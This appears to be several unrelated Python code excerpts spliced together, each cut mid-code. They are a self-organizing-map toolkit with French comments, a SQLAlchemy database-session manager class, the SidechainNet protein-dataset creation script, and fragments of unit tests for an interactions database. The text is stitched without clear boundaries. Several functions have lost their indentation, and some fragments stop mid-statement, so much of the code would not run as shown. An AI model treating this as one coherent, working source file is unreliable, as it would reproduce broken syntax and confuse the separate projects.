'''
# Cette fonction peut etre remplacer par mbmus ; on la garde
# cependant pour assurer une compatibilité vers le bas.
if Data==[] or Data is None: # par defaut on prend celles de sm supposées etre celles d'App.
Data = sm.data
nbdata = np.size(Data,0);
BMUS = np.ones(nbdata).astype(int)*-1;
distance = np.zeros(sm.nnodes);
for i in np.arange(nbdata) :
for j in np.arange(sm.nnodes) :
C = Data[i,:] - sm.codebook[j,:];
distance[j] = np.dot(C,C);
Imindist = np.argmin(distance);
BMUS[i] = Imindist;
return BMUS
def mbmus(sm, Data=None, narg=1):
    """Multiple best-matching units (this function can replace findbmus).

    Args:
        sm   : the topological map structure
        Data : the data whose bmus are wanted; defaults to the data attached
               to the map (assumed to be the training data)
        narg : number of bmus to return, ordered from closest to farthest
    Returns:
        (nbdata, narg) int array of codebook indices.
    """
    # BUG FIX: test `is None` first.  `Data==[]` on a numpy array performs an
    # elementwise comparison, not an emptiness test.
    if Data is None or len(Data) == 0:
        Data = sm.data
    nbdata = np.size(Data, 0)
    MBMUS = np.ones((nbdata, narg)).astype(int) * -1
    for i in np.arange(nbdata):
        # Vectorized squared distances to all codebook vectors at once.
        diff = sm.codebook - Data[i, :]
        distance = np.einsum('ij,ij->i', diff, diff)
        MBMUS[i] = np.argsort(distance)[0:narg]
    return MBMUS
def errtopo(sm, bmus2):
    """Topographic error, for a rectangular ('RECT') map only.

    te: proportion of data vectors whose first AND second BMUs are not
    adjacent map units.  E.g. on a 5-column grid the neighbours of node 7
    are 7-5, 7-1, 7+1, 7+5 = (2, 6, 8, 12); a second bmu of 13 or 8+5 is
    therefore "not adjacent".

    Args:
        sm    : map structure (uses sm.mapsize and sm.dlen)
        bmus2 : (N, 2) array with first and second bmu of each data vector
    Returns:
        Fraction of non-adjacent (first, second) bmu pairs.
    """
    # NOTE(review): mapsize[0] is used as the number of columns here --
    # confirm against the row/column convention used elsewhere.
    ncols = sm.mapsize[0]
    offsets = np.array([-ncols, -1, +1, +ncols])
    not_adjacent = sum(
        1.0 for k in range(sm.dlen)
        if bmus2[k, 1] not in bmus2[k, 0] + offsets
    )
    return not_adjacent / sm.dlen
def findhits(sm, bmus=None):
    """HITS = findhits(sm, bmus=None)

    Number of data items captured by each reference vector.  This count is
    called the "hit" (or magnitude) of the node.  If bmus is not given, it is
    computed from the map's training data via findbmus.

    Preconditions:
        All values in bmus lie in [0, sm.nnodes).
    """
    # BUG FIX: test `is None` first.  `bmus==[]` on a numpy array performs an
    # elementwise comparison, not an emptiness test.
    if bmus is None or len(bmus) == 0:
        bmus = np.array(findbmus(sm))
    # One O(n) counting pass instead of an np.where scan per node.
    HITS = np.bincount(np.asarray(bmus, dtype=int), minlength=sm.nnodes)
    return HITS.astype(int)
#def gatheril (indices, labels, sep='\n') :
def gatheril (indices, labels) :
    """Group labels by index value.

    Returns (Uind, Ulab): the unique index values in order of first
    appearance, and for each one a single string concatenating the labels of
    every item carrying that index.  Successive labels of the same index are
    joined with alternating ' ' and '\\n' separators (Csep flips each time),
    producing a two-per-line layout when displayed.
    """
    sep=' '
    if len(indices) != len(labels) :
        print("indices and Labels must have the same number of items")
        sys.exit(0);
    labs = np.copy(labels).astype(str)
    # Flag[v] = position of index value v in Uind/Ulab, or -1 if unseen yet.
    Flag  = (np.ones(max(indices+1))*-1).astype(int);
    Uind  = (np.ones(len(tls.unique(indices)))*-1).astype(int);
    #Ulab = np.empty(len(tls.unique(indices))).astype(str)
    Ulab  = np.empty(len(tls.unique(indices)),dtype='<U64')
    Csep  = (np.empty(max(indices+1))).astype(str);
    k     = 0;
    for i in np.arange(len(indices)) :
        if Flag[indices[i]] == -1 :
            # First occurrence of this index value: open a new group.
            Flag[indices[i]] = k;
            Uind[k] = indices[i];
            Ulab[k] = labs[i];
            Csep[k] = ' ';
            k = k + 1;
        else :
            # NOTE(review): Flag[indices[i]] is a scalar when `indices` is a
            # flat int array, and scalar[0] raises IndexError -- presumably
            # indices arrive with an extra dimension here; confirm with callers.
            fii = Flag[indices[i]][0];
            #Ulab[fii] = Ulab[fii] + '\n' + labs[i]
            #Ulab[fii] = Ulab[fii] + sep + labs[i]
            Ulab[fii] = Ulab[fii] + Csep[fii] + labs[i]
            #if sep==' ' : sep='\n'; else : sep=' ';
            # Alternate the separator for the NEXT label of this same group.
            if Csep[fii]==' ' :
                Csep[fii]='\n';
            else :
                Csep[fii]=' ';
    return Uind, Ulab
def showmap(sm, sztext=11, coltext='k',colbar=True, cmap=cm.jet, interp=None,caxmin=None,
caxmax=None,axis=None, comp=[], nodes=None, Labels=None, dh=0, dv=0) :
''' showmap(sm, sztext, colbar, cmap, interp, caxmin,caxmax)
| Visualisations des variables (componants) de la carte. Il s'agit d'un
| équivalent moins sophistiqué de som_show (sans la U-Matrix)
| Les paramètres :
| sm : La structure de la carte (C'est le seul paramètre obligatoire)
| sztext : la taille du text : 11 par défaut
| colbar : Affichage de la colorbar : True par défaut
| cmap : Map de couleur : jet par défaut
| interp : Valeur du paramètre d'interpolation pour la fonction imshow de
| Matplotlib. Par défaut, ou en présence de None, un lissage des
| couleurs est effectué (comme le shading interp de matlab).
| Passer la valeur 'none' pour ne pas faire de lissage.
| caxmin, et caxmax : permet de définir des bornes min et max communes
| pour les échelles de couleur de toutes les variables.
| axis : Permet d'agir sur les axes ('off', equal','tight',...)
| comp : Liste d'ndice(s) des composantes (variables) à afficher; par
| défaut, elles le seront toutes.
'''
nbl, nbc = sm.mapsize;
if comp is None or comp==[] :
nvar = sm.dim;
comp = np.arange(nvar);
else :
nvar = len(comp)
comp = np.asarray(comp)
comp = comp - 1;
fig = plt.figure();
nbsubc = np.ceil(np.sqrt(nvar));
nbsubl = np.ceil(nvar/nbsubc);
isub=0;
if nodes is not None or Labels is not None :
if len(nodes) != len(Labels) :
print("triedctk.showmap: nodes and Labels must have the same number of items")
sys.exit(0);
Unodes, Ulabels = gatheril(nodes, Labels)
for i in comp :
isub+=1;
plt.subplot(nbsubl,nbsubc,isub);
Ref2D = sm.codebook[:,i].reshape(nbl,nbc);
if caxmin==None :
vmin = np.min(Ref2D);
else :
vmin = caxmin;
if caxmax==None :
vmax = np.max(Ref2D);
else :
vmax = caxmax;
#if interp=='on' :
# plt.imshow(Ref2D,cmap=cmap, vmin=vmin, vmax=vmax);
#else :
# plt.imshow(Ref2D,interpolation='none',cmap=cmap, vmin=vmin, vmax=vmax);
plt.imshow(Ref2D,interpolation=interp, cmap=cmap, vmin=vmin, vmax=vmax);
if sm.varname==[] :
plt.title("Variable %d" %(isub), fontsize=sztext);
else :
plt.title("%s" %(sm.varname[i]), fontsize=sztext);
if colbar==True :
plt.colorbar();
#if 1==0 : # This is to confirm, regardless codebook,
# inode = 0 # how neurones cells are ordered
# for i in np.arange(nbl) :
# for j in np.arange(nbc) :
# inode = +=1;
# plt.text(j,i,"%d" %(inode),fontsize=12),
if 0 : #nodes | |
<reponame>libcommon/sqlalchemy-dbutils-py
## -*- coding: UTF8 -*-
## manager.py
## Copyright (c) 2020 libcommon
##
## Permission is hereby granted, free of charge, to any person obtaining a copy
## of this software and associated documentation files (the "Software"), to deal
## in the Software without restriction, including without limitation the rights
## to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
## copies of the Software, and to permit persons to whom the Software is
## furnished to do so, subject to the following conditions:
##
## The above copyright notice and this permission notice shall be included in all
## copies or substantial portions of the Software.
##
## THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
## IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
## FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
## AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
## LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
## OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
## SOFTWARE.
from getpass import getpass
import os
from pathlib import Path
from typing import Any, Optional, Union
from sqlalchemy import create_engine as sqla_create_engine, MetaData
from sqlalchemy.engine import Engine
from sqlalchemy.engine.url import make_url, URL
from sqlalchemy.orm import scoped_session as ScopedSession, Session, sessionmaker as SessionMaker
from sqlalchemy.orm.query import Query
__author__ = "libcommon"


# Factory types: a plain sessionmaker, or a thread-local scoped_session registry.
DBManagerSessionFactory = Union[ScopedSession, SessionMaker]
# An active session handle (a scoped_session proxies the underlying Session).
DBManagerSession = Union[ScopedSession, Session]
# Connection URLs may be given as RFC1738 strings or pre-parsed URL objects.
ConnectionURL = Union[str, URL]
class DBManager:
    """SQLAlchemy ORM database connection manager with
    utility methods for connecting to, querying, performing/rolling back
    transactions on, and deleting records from the database. Agnostic to
    database backend and designed for use within a single process (not shared
    by multiple processes.)
    """
    # __slots__ avoids a per-instance __dict__ and rejects stray attributes.
    __slots__ = ("_engine", "_scoped_sessions", "_session", "_session_factory", "connection_url", "metadata",)
@classmethod
def from_file(cls, config_path_str: str) -> "DBManager":
"""
Args:
config_path => path to file containing connection URL
Description:
Reads connection URL from config file and creates instance of class.
Will validate connection URL and if it doesn't have password, will prompt user.
Preconditions:
Connection URL must be a valid RFC1738 URL and must be the only content in the file.
Raises:
FileNotFoundError: if provided config_path isn't an existing file
ValueError: if validation (parsing) of connection URL fails
"""
# Ensure config_path is existing file
config_path = Path(config_path_str)
if not config_path.is_file():
raise FileNotFoundError(str(config_path))
# Read first line from file and use as connection URL
with open(str(config_path)) as config_file:
connection_url_str = config_file.read().strip()
# Parse connection URL into various components
try:
connection_url = make_url(connection_url_str)
except Exception as exc:
raise ValueError("Failed to parse URL from file ({})".format(exc))
# If is not SQLite file and password not provided, get password from user
if not ("sqlite" in connection_url.drivername or connection_url.password):
passwd = getpass("Enter database password: ")
connection_url.password = <PASSWORD>
return cls(connection_url)
    def __init__(self,
                 connection_url: ConnectionURL,
                 metadata: Optional[MetaData] = None,
                 scoped_sessions: bool = False):
        """
        Args:
            connection_url => RFC1738 URL string or pre-parsed URL object
            metadata => SQLAlchemy MetaData describing the schema (optional)
            scoped_sessions => if True, use thread-local scoped sessions
        Description:
            Store connection settings only; no engine or session is created
            until create_engine()/connect() is called.
        """
        # Normalize string URLs to a parsed URL object up front.
        if isinstance(connection_url, str):
            connection_url = make_url(connection_url)
        self.connection_url = connection_url
        self.metadata = metadata
        self._scoped_sessions = scoped_sessions
        # Engine and session state are created lazily by connect()/gen_session().
        self._engine: Optional[Engine] = None
        self._session: Optional[Session] = None
        self._session_factory: Optional[DBManagerSessionFactory] = None
    def create_engine(self, **kwargs) -> "DBManager":
        """
        Args:
            kwargs => passed to SQLAlchemy Engine constructor
        Description:
            Create SQLAlchemy Engine using self.connection_url.
            See: https://docs.sqlalchemy.org/en/13/core/engines.html
        Preconditions:
            N/A
        Raises:
            RuntimeError: if self._engine is already set
        """
        # Ensure self._engine isn't already defined
        # NOTE: Consider whether this implementation makes sense, or if it makes more sense
        # to simply dispose of existing engine (with DEBUG log) before creating new one.
        if self._engine:
            raise RuntimeError("Cannot attach new Engine without removing existing one")
        # Create SQLAlchemy Engine with connection URL
        engine = sqla_create_engine(self.connection_url, **kwargs)
        self._engine = engine
        return self
    def close_engine(self) -> "DBManager":
        """
        Args:
            N/A
        Description:
            Close and dispose of existing Engine and connection pool on
            self._engine if defined.  Any active session is closed first so
            it does not hold a connection from the disposed pool.
        Preconditions:
            N/A
        Raises:
            N/A
        """
        # If have active session, close it before engine
        if self.session():
            self.close_session()
        # If self._engine defined
        if self._engine:
            # Dispose of existing connection pool
            self._engine.dispose()
            self._engine = None
        return self
    def with_metadata(self, metadata: MetaData) -> "DBManager":
        """
        Args:
            metadata => SQLAlchemy MetaData describing the schema
        Description:
            Setter for self.metadata using builder pattern.
        Preconditions:
            N/A
        Raises:
            N/A
        """
        self.metadata = metadata
        return self
def bootstrap_db(self) -> "DBManager":
"""
Args:
N/A
Description:
Create all tables defined in self.metadata.
See: https://docs.sqlalchemy.org/en/13/core/metadata.html
Preconditions:
N/A
Raises:
N/A
"""
if not self._engine:
raise RuntimeError("Cannot bootstrap database without an Engine")
if not self.metadata:
raise RuntimeError("Cannot bootstrap database with MetaData")
self.metadata.create_all(self._engine)
return self
    def create_session_factory(self, **kwargs) -> "DBManager":
        """
        Args:
            kwargs => passed to SQLAlchemy sessionmaker constructor
        Description:
            Create SQLAlchemy scoped_session if self._scoped_sessions is True,
            otherwise sessionmaker. All kwargs are passed to sessionmaker constructor.
            This method should only be called _once_ by the DBManager. SQLAlchemy doesn't
            recommend manually closing all sessions, and the mechanics for doing so have changed
            across versions.
            See: https://docs.sqlalchemy.org/en/13/orm/session_api.html#session-and-sessionmaker
                 and https://docs.sqlalchemy.org/en/13/orm/contextual.html#sqlalchemy.orm.scoping.scoped_session
                 and https://docs.sqlalchemy.org/en/13/orm/session_api.html#sqlalchemy.orm.session.sessionmaker.close_all
        Preconditions:
            N/A
        Raises:
            RuntimeError: if self._session_factory is already defined, or
                          if self._engine isn't defined
        """
        # Ensure self._session_factory isn't already defined
        if self._session_factory:
            raise RuntimeError("Session factory already created")
        # Ensure self._engine is defined
        if not self._engine:
            raise RuntimeError("Cannot create session factory without an Engine")
        # Generate sessionmaker session factory
        self._session_factory = SessionMaker(bind=self._engine, **kwargs)
        # If scoped sessions, wrap in scoped_sessions factory
        if self._scoped_sessions:
            self._session_factory = ScopedSession(self._session_factory)
        return self
    def connect(self, bootstrap: bool = False) -> "DBManager":
        """
        Args:
            bootstrap => if True, create all tables from self.metadata after
                         creating the engine
        Description:
            Create database engine and session factory (but _not_ active session).
            gen_session must be called subsequently to create an active session.
            If bootstrap specified, use self.metadata and self._engine to create all tables,
            indexes, views, etc.
        Preconditions:
            N/A
        Raises:
            RuntimeError: propagated from bootstrap_db if bootstrap is True and
                          self.metadata isn't defined
        """
        # Generate database engine if needed
        if not self._engine:
            self.create_engine()
        # Bootstrap database if asked
        if bootstrap:
            self.bootstrap_db()
        # Generate session factory if needed
        if not self._session_factory:
            self.create_session_factory()
        return self
    def gen_session(self, persist: bool = True) -> DBManagerSession:
        """
        Args:
            persist => whether to persist created session on self
        Description:
            Generate new database session. If persist is True, assign new session
            to self._session. In this way, the DBManager can act simply as a factory for new sessions,
            or as a more complete DB manager. Use the `session` method to access the active session.
            Under scoped sessions the factory itself is returned and `persist` is ignored.
            See: https://docs.sqlalchemy.org/en/13/orm/session_basics.html#basics-of-using-a-session
        Preconditions:
            N/A
        Raises:
            RuntimeError: if self._session_factory hasn't been created yet, or
                          if self._session is already set and persist is True (for non-scoped sessions)
        """
        # Ensure session factory has been created
        if not self._session_factory:
            raise RuntimeError("Session factory must be created before a session can be generated")
        # If scoped sessions, return scoped session manager
        if self._scoped_sessions:
            return self._session_factory  # type: ignore
        # Otherwise, generate new session from session factory
        session = self._session_factory()
        # If persist session to self, ensure self.session isn't already defined
        if persist:
            if self._session:
                raise RuntimeError("Cannot attach new Session without removing existing Session")
            self._session = session
        return session
def session(self) -> Optional[DBManagerSession]:
"""
Args:
N/A
Description:
Current session (if exists).
Preconditions:
N/A
Raises:
N/A
"""
# If scoped sessions, return scoped session manager
if self._scoped_sessions:
return self._session_factory # type: ignore
# Otherwise, return self._session
return self._session
    def close_session(self) -> "DBManager":
        """
        Args:
            N/A
        Description:
            Close the current session.  No-op if no session exists.
        Preconditions:
            N/A
        Raises:
            N/A
        """
        # If scoped sessions and session factory has been initialized,
        # remove current session
        if self._scoped_sessions and self._session_factory:
            self._session_factory.remove()  # type: ignore
        # If session on self, close it
        elif self._session:
            self._session.close()
            self._session = None
        return self
    def _assert_session(self) -> DBManagerSession:
        """
        Args:
            N/A
        Description:
            Return the active session or raise if there is none. If scoped_sessions
            is True, then requires self._session_factory to be defined.
            Otherwise, requires self._session to be defined (non-None).
        Preconditions:
            N/A
        Raises:
            RuntimeError: if no active session is defined
        """
        session = self.session()
        if not session:
            raise RuntimeError("Must have active session")
        return session
def query(self, model: Any, **kwargs) -> Query:
"""
Args:
model => model of table to query
kwargs => passed to query.filter method
Description:
Wrapper for Session.query, with option to build WHERE clause.
See: https://docs.sqlalchemy.org/en/13/orm/session_api.html#sqlalchemy.orm.session.Session.query
Preconditions:
record is instance of class whose parent class was created using SQLAlchemy's declarative_base.
Raises:
RuntimeError: if self._session isn't defined
"""
| |
<gh_stars>100-1000
"""Generates SidechainNet files.
SidechainNet is an all-atom protein structure prediction dataset for machine learning.
SidechainNet extends ProteinNet, including angles and coordinates that describe both
the backbone and sidechain components of each protein structure.
The procedure is as follows:
0. Download ProteinNet raw/text files before calling this script.
1. Parse raw/text ProteinNet files into Python dictionaries.
2. Take ProteinNet IDs (pnids) and download the corresponding all-atom information.
3. Unify the data provided by ProteinNet with the all-atom data by aligning the
protein sequences from ProteinNet with those observed during downloading.
To generate all ProteinNet datasets for a CASP competition, run:
python create.py $PATH_TO_PROTEINNET_FILES_FOR_SINGLE_CASP --thinning all
To generate a single "thinning" (e.g. 30) for a CASP competition, run:
python create.py $PATH_TO_PROTEINNET_FILES_FOR_SINGLE_CASP --thinning 30
Author: <NAME>
Date: 10/28/2020
"""
import argparse
from collections import namedtuple
import os
from multiprocessing import Pool, cpu_count
import pkg_resources
from sidechainnet.utils.sequence import ONE_TO_THREE_LETTER_MAP
import numpy as np
import prody as pr
from tqdm import tqdm
from sidechainnet.utils.align import (assert_mask_gaps_are_correct, expand_data_with_mask,
init_aligner, merge)
from sidechainnet.utils.download import PN_VALID_SPLITS, _reinit_global_valid_splits, download_complete_proteinnet, download_sidechain_data, get_sequence_from_pnid
from sidechainnet.utils.errors import write_errors_to_files
from sidechainnet.utils.manual_adjustment import (manually_adjust_data,
manually_correct_mask,
needs_manual_adjustment)
from sidechainnet.utils.measure import NUM_COORDS_PER_RES
from sidechainnet.utils.organize import get_validation_split_identifiers_from_pnid_list, load_data, organize_data, save_data
from sidechainnet.utils.parse import parse_raw_proteinnet
PNID_CSV_FILE = None
pr.confProDy(verbosity="none")
pr.confProDy(auto_secondary=False)
ArgsTuple = namedtuple(
"ArgsTuple", "casp_version thinning proteinnet_in proteinnet_out "
"sidechainnet_out regenerate_scdata limit")
def combine(pn_entry, sc_entry, aligner, pnid):
    """Supplements one entry in ProteinNet with sidechain information.
    Args:
        aligner: A sequence aligner with desired settings. See
            utils.alignment.init_aligner().
        pn_entry: A dictionary describing a single ProteinNet protein. Contains
            sequence, coordinates, PSSMs, secondary structure.
        sc_entry: A dictionary describing the sidechain information for the same
            protein. Contains sequence, coordinates, and angles.
        pnid: The ProteinNet identifier for this protein.
    Returns:
        A (new_entry, warning) tuple: the unified entry dictionary (empty on
        failure) and a warning string describing any issue encountered.
    """
    sc_entry = manually_adjust_data(pnid, sc_entry)
    if needs_manual_adjustment(pnid):
        return {}, "needs manual adjustment"
    # If there is no corresponding ProteinNet entry, we create a template entry
    if pn_entry is None:
        seq = get_sequence_from_pnid(pnid)
        pn_entry = {
            "primary": seq,
            # Zero PSSM placeholder (21 columns) and an all-unknown mask.
            "evolutionary": np.zeros((len(seq), 21)),
            "mask": "?" * len(seq)
        }
        # NOTE(review): alignment/crd/ang/dssp set here are overwritten by the
        # unconditional merge() call below -- these assignments look redundant;
        # confirm before removing.
        alignment = True
        crd = sc_entry['crd']
        ang = sc_entry['ang']
        dssp = sc_entry['sec']
        ignore_pnmask = True
    else:
        ignore_pnmask = False
    mask, alignment, ang, crd, dssp, unmod_seq, is_mod, warning = merge(
        aligner, pn_entry, sc_entry, pnid, ignore_pnmask=ignore_pnmask)
    new_entry = {}
    if alignment:
        # Create new SidechainNet entry containing all information
        new_entry["seq"] = pn_entry["primary"]
        new_entry["evo"] = pn_entry["evolutionary"]
        correct_gaps, bad_gap_len = assert_mask_gaps_are_correct(mask, crd)
        if not correct_gaps:
            return {}, "bad gaps"
        # We may need to add padding where specified by the mask
        mask = manually_correct_mask(pnid, pn_entry, mask)
        new_entry["ang"] = expand_data_with_mask(ang, mask)
        new_entry["crd"] = expand_data_with_mask(crd, mask)
        new_entry["sec"] = expand_data_with_mask(dssp, mask)
        new_entry["ums"] = make_unmodified_seq_entry(new_entry["seq"], unmod_seq, mask)
        new_entry["mod"] = expand_data_with_mask(is_mod, mask)
        new_entry["msk"] = mask
        new_entry["res"] = sc_entry["res"]
        # Sanity check: every per-residue field must match the sequence length
        # ("crd" has NUM_COORDS_PER_RES rows per residue; "ums" is
        # space-separated; "res" is a scalar resolution and is exempt).
        length = len(pn_entry["primary"])
        for k, v in new_entry.items():
            if k == "crd":
                if len(v) // NUM_COORDS_PER_RES != length:
                    return {}, "failed"
            elif k == "ums":
                if len(v.split(" ")) != length:
                    return {}, "failed"
            elif k != "res":
                if len(v) != length:
                    return {}, "failed"
    return new_entry, warning
def combine_wrapper(pndata_scdata_pnid):
    """Unpack a (pn_data, sc_data, pnid) tuple and run combine (for mp.Pool)."""
    pn_data, sc_data, pnid = pndata_scdata_pnid
    # Each worker call builds its own aligner rather than sharing one.
    return combine(pn_data, sc_data, init_aligner(), pnid)
def make_unmodified_seq_entry(pn_seq, unmod_seq, mask):
    """Given observed residues, create the unmodified sequence entry for SidechainNet.

    Positions where the padded unmodified sequence reads "---" (unobserved)
    are filled in with the 3-letter code of the ProteinNet residue.
    """
    padded = expand_data_with_mask(unmod_seq, mask)
    return " ".join(
        ONE_TO_THREE_LETTER_MAP[pn_res] if unmod_res == "---" else unmod_res
        for pn_res, unmod_res in zip(pn_seq, padded))
def combine_datasets(proteinnet_out, sc_data, thinning=100):
    """Adds sidechain information to ProteinNet to create SidechainNet.
    Args:
        proteinnet_out: Location of preprocessed ProteinNet data
        sc_data: Sidechain data dictionary with keys being ProteinNet IDs
        thinning: Which training set thinning to use (i.e. 30, 50,... 100)
    Returns:
        SidechainNet as a dictionary mapping ProteinNet IDs to all data relevant
        for sidechain prediction.
    """
    print("Preparing to merge ProteinNet data with downloaded sidechain data.")
    # Load training (at the requested thinning), validation, and test splits
    # into a single pnid -> entry dictionary.
    pn_files = [
        os.path.join(proteinnet_out, f"training_{thinning}.pkl"),
        os.path.join(proteinnet_out, "validation.pkl"),
        os.path.join(proteinnet_out, "testing.pkl")
    ]
    pn_data = {}
    for f in pn_files:
        d = load_data(f)
        pn_data.update(d)
        del d  # free each split as soon as it is merged
    # Fan the per-protein merge out over all cores; tqdm tracks progress.
    with Pool(cpu_count()) as p:
        tuples = (get_tuple(pn_data, sc_data, pnid) for pnid in sc_data.keys())
        results_warnings = list(
            tqdm(p.imap(combine_wrapper, tuples),
                 total=len(sc_data.keys()),
                 dynamic_ncols=True))
    combined_data, errors = write_errors_to_files(results_warnings, sc_data.keys())
    print(f"Finished unifying sidechain information with ProteinNet data.\n"
          f"{len(errors['failed'])} IDs failed to combine successfully.")
    return combined_data
def get_tuple(pndata, scdata, pnid):
    """Extract relevant SidechainNet and ProteinNet data from their respective dicts.

    Returns (pn_entry_or_None, sc_entry, pnid); the ProteinNet entry is None
    when the ID is absent from pndata.
    """
    return pndata.get(pnid), scdata[pnid], pnid
def format_sidechainnet_path(casp_version, training_split):
    """Return the .pkl filename for a CASP version and training split."""
    if casp_version == "debug":
        return "sidechainnet_debug.pkl"
    return "sidechainnet_casp{}_{}.pkl".format(casp_version, training_split)
def create(casp_version=12,
           thinning=30,
           sidechainnet_out="./sidechainnet_data",
           regenerate_scdata=False,
           limit=None):
    """Generate the requested SidechainNet dataset and save pickled result files.
    This function replicates CLI behavior of calling `python sidechainnet/create.py`.
    Args:
        casp_version (int, optional): CASP dataset version (7-12). Defaults to 12.
        thinning (int, optional): Training set thinning (30, 50, 70, 90, 95, 100
            where 100 means 100% of the training set is kept). If 'all', generate all
            training set thinnings. Defaults to 30.
        sidechainnet_out (str, optional): Path for saving processed SidechainNet records.
            Defaults to "data/sidechainnet/".
        regenerate_scdata (bool, optional): If true, regenerate raw sidechain-applicable
            data instead of searching for data that has already been preprocessed.
            Defaults to False.
        limit (bool, optional): The upper limit on number of proteins to process,
            useful when debugging. Defaults to None.
    Raises:
        ValueError: when ProteinNet data paths are non-existant or not as expected,
            or when casp_version == "debug" (unsupported here).
    """
    if casp_version == "debug":
        raise ValueError("'debug' is not currently supported by scn.create.\n"
                         "Use scn.create(12, 'all') and a debug dataset will be created.")
    # Download ProteinNet custom-helper package (concatenated ProteinNet datasets)
    proteinnet_in = download_complete_proteinnet()
    # The downloaded package is already parsed, so it doubles as the output dir.
    proteinnet_out = proteinnet_in
    args = ArgsTuple(casp_version, thinning, proteinnet_in, proteinnet_out,
                     sidechainnet_out, regenerate_scdata, limit)
    # NOTE(review): `main` is not among the imports visible in this chunk --
    # presumably defined later in this module; confirm.
    main(args)
def _create(args):
    """Generates SidechainNet for a single CASP thinning.

    Args:
        args: ArgsTuple with casp_version, thinning, proteinnet_in/out,
            sidechainnet_out, regenerate_scdata, and limit.
    """
    # First, parse raw proteinnet files into Python dictionaries for convenience
    # NOTE(review): `get_proteinnet_ids` is not among the imports visible in
    # this chunk -- confirm it is imported elsewhere in this module.
    pnids = get_proteinnet_ids(casp_version=args.casp_version,
                               split="all",
                               thinning=args.thinning)
    pnids = pnids[:args.limit]  # Limit the length of the list for debugging
    # Using the ProteinNet IDs as a guide, download the relevant sidechain data
    sc_only_data, sc_filename = download_sidechain_data(pnids, args.sidechainnet_out,
                                                        args.casp_version, args.thinning,
                                                        args.limit, args.proteinnet_in,
                                                        args.regenerate_scdata)
    # Finally, unify the sidechain data with ProteinNet
    sidechainnet_raw = combine_datasets(args.proteinnet_out, sc_only_data)
    sidechainnet_outfile = os.path.join(
        args.sidechainnet_out, format_sidechainnet_path(args.casp_version, args.thinning))
    sidechainnet = organize_data(sidechainnet_raw, args.casp_version, args.thinning)
    save_data(sidechainnet, sidechainnet_outfile)
    print(f"SidechainNet for CASP {args.casp_version} written to {sidechainnet_outfile}.")
def _create_all(args):
    """Generate all thinnings of a particular CASP dataset, starting with the largest.

    Downloads/combines the 100% thinning once, then derives the debug set and
    every smaller thinning from it without re-downloading.
    """
    # First, parse raw proteinnet files into Python dictionaries for convenience
    # NOTE(review): `get_proteinnet_ids` is not among the imports visible in
    # this chunk -- confirm it is imported elsewhere in this module.
    pnids = get_proteinnet_ids(casp_version=args.casp_version, split="all", thinning=100)
    pnids = pnids[:args.limit]  # Limit the length of the list for debugging
    # Using the ProteinNet IDs as a guide, download the relevant sidechain data
    sc_only_data, sc_filename = download_sidechain_data(
        pnids,
        args.sidechainnet_out,
        args.casp_version,
        100,
        args.limit,
        args.proteinnet_in,
        regenerate_scdata=args.regenerate_scdata)
    # Finally, unify the sidechain data with ProteinNet
    sidechainnet_raw_100 = combine_datasets(args.proteinnet_out, sc_only_data)
    # Generate debug dataset with 200 training examples
    sc_outfile = os.path.join(args.sidechainnet_out, format_sidechainnet_path("debug", 0))
    debug = organize_data(sidechainnet_raw_100,
                          args.casp_version,
                          thinning=100,
                          is_debug=True)
    save_data(debug, sc_outfile)
    print(f"SidechainNet for CASP {args.casp_version} (debug) written to {sc_outfile}.")
    # Generate the rest of the training sets (each thinning is a subset of 100)
    for thinning in [100, 95, 90, 70, 50, 30]:
        sc_outfile = os.path.join(args.sidechainnet_out,
                                  format_sidechainnet_path(args.casp_version, thinning))
        sidechainnet = organize_data(sidechainnet_raw_100, args.casp_version, thinning)
        save_data(sidechainnet, sc_outfile)
        print(f"SidechainNet for CASP {args.casp_version} "
              f"({thinning}% thinning) written to {sc_outfile}.")
def create_custom(pnids,
output_filename,
sidechainnet_out="./sidechainnet_data",
short_description="Custom SidechainNet dataset.",
regenerate_scdata=False):
"""Generate a custom SidechainNet dataset from user-specified ProteinNet IDs.
This function utilizes a concatedated version of ProteinNet generated by the author.
This dataset contains the 100% training set thinning from CASP 12, as well as the
concatenation of every testing and validation sets from CASPs 7-12. By collecting
this information into one directory (which this function downloads), the user can
specify any set of ProteinNet IDs that they would like to include, and this
function will be abel to access such data if it is available.
Args:
pnids (List): List of ProteinNet-formatted protein identifiers (i.e., formmated
according to <class>#<pdb_id>_<chain_number>_<chain_id>. ASTRAL identifiers
are also supported, <class>#<pdb_id>_<ASTRAL_id>.)
output_filename (str): Path to save custom dataset (a pickled Python
dictionary). ".pkl" extension is recommended.
sidechainnet_out (str, optional): Path to save processed SidechainNet data.
Defaults to "data/sidechainnet/".
short_description (str, optional): A short description provided by the user to
describe the dataset. Defaults to "Custom SidechainNet dataset.".
regenerate_scdata (bool, optional): If true, regenerate raw sidechain-applicable
data instead of searching for data that has already been preprocessed.
Defaults to False.
Returns:
dict: Saves and | |
<= 1').exists('rid >= 1') is True
def test_exists_6(db_interactions_with_mult_cols):
    # A timestamp threshold within the fixture's range -> at least one match.
    assert db_interactions_with_mult_cols.exists('timestamp >= 950.52') is True
def test_exists_7(db_interactions_with_mult_cols):
    # A threshold above every fixture timestamp -> no match.
    assert db_interactions_with_mult_cols.exists('timestamp >= 9500.52') is False
def test_exists_8(db_interactions_floats):
    # Exact float equality: 5.0 is not among the fixture interactions.
    assert db_interactions_floats.exists('interaction == 5.0') is False
def test_exists_9(db_interactions_floats):
    # ...but 5.5 is.
    assert db_interactions_floats.exists('interaction == 5.5') is True
def test_exists_10(db_interactions_floats):
    # Integer literal compared against float-typed column.
    assert db_interactions_floats.exists('interaction == 3') is True
""" unique """
def test_unique_0(db_interactions):
assert check_list_equal(db_interactions.unique().values_list(), [
{'item': 'ps4', 'interaction': 3.0, 'rid': 0, 'user': 'jack'},
{'item': 'hard-drive', 'interaction': 4.0, 'rid': 1, 'user': 'john'},
{'item': 'pen', 'interaction': 1.0, 'rid': 2, 'user': 'alfred'},
